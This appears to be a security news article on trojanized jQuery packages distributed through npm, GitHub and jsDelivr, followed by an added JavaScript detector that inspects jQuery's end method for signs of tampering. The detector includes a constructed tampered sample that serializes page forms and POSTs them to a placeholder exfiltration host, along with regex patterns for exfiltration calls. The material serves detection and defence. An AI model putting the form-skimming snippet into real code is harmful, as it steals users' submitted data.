
Trojanized jQuery Packages Spread via 'Complex' Supply Chain Attack

The campaign, which distributes dozens of malicious jQuery variants across npm, GitHub, and jsDelivr, appears to be a manual effort, and lacks the typical pattern that characterizes similar, related attacks.

In a recent supply chain attack, cyberattackers have been distributing Trojanized packages for the popular JavaScript library jQuery across npm, GitHub, and jsDelivr. The malicious packages contain a copy of jQuery whose end function has been modified to include additional code that extracts website form data and sends it to various URLs. The attackers show an unusual lack of a clear pattern in package naming and attribution, which makes their activity difficult to track. Although the attack appears to be a targeted effort, the broad distribution of the packages means it can affect unsuspecting developers widely. The campaign illustrates the growing complexity and potential reach of supply chain threat actors. Organizations and developers are encouraged to scan any code used in development projects before distributing it to developers, to avoid installing the malicious packages. In their blog post, Phylum's researchers list every package name associated with the campaign, the date each was published, and the username that published it.
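As an added illustration (not Phylum's code or part of the article), the check below audits a jQuery source text for the tampering the campaign relied on: genuine jQuery implements end as a one-line return of prevObject, so form-serialization or network calls inside that method body are a red flag. The indicator patterns and both sample sources are constructed for this example.

```javascript
// Added example: static audit of the jQuery `end` method body.
// Real jQuery's `end` only returns this.prevObject || this.constructor();
// anything touching forms or the network there is suspicious.

// Constructed indicator list (assumption: typical exfiltration primitives).
const SUSPICIOUS = [
  /\bfetch\s*\(/, /\bXMLHttpRequest\b/, /\bsendBeacon\s*\(/,
  /\.serialize(Array)?\s*\(/, /\bFormData\b/, /https?:\/\//,
];

// Return the body of the first `end: function(...) { ... }` member, or null.
function extractEndBody(src) {
  const m = /\bend\s*:\s*function\s*\([^)]*\)\s*\{/.exec(src);
  if (!m) return null;
  let depth = 1, i = m.index + m[0].length;
  const start = i;
  for (; i < src.length && depth > 0; i++) {   // naive brace matching
    if (src[i] === '{') depth++;
    else if (src[i] === '}') depth--;
  }
  return depth === 0 ? src.slice(start, i - 1) : null;
}

// Audit one jQuery file; returns which indicator patterns matched inside `end`.
function auditJQuerySource(src) {
  const body = extractEndBody(src);
  if (body === null) return { found: false, indicators: [] };
  const indicators = SUSPICIOUS.filter(re => re.test(body)).map(re => re.source);
  return { found: true, indicators };
}

// Constructed samples, not contents of any real package.
const CLEAN = `jQuery.fn.extend({ end: function() {
  return this.prevObject || this.constructor();
} });`;

const TAMPERED = `jQuery.fn.extend({ end: function() {
  var d = jQuery("form").serialize();
  fetch("https://PLACEHOLDER-exfil-host.invalid/collect", { method: "POST", body: d });
  return this.prevObject || this.constructor();
} });`;

console.log("clean:", auditJQuerySource(CLEAN));      // indicators: []
console.log("tampered:", auditJQuerySource(TAMPERED)); // three indicators
```

A method-level heuristic like this only narrows the search; diffing the whole file against the pristine release from the official distribution is the decisive check.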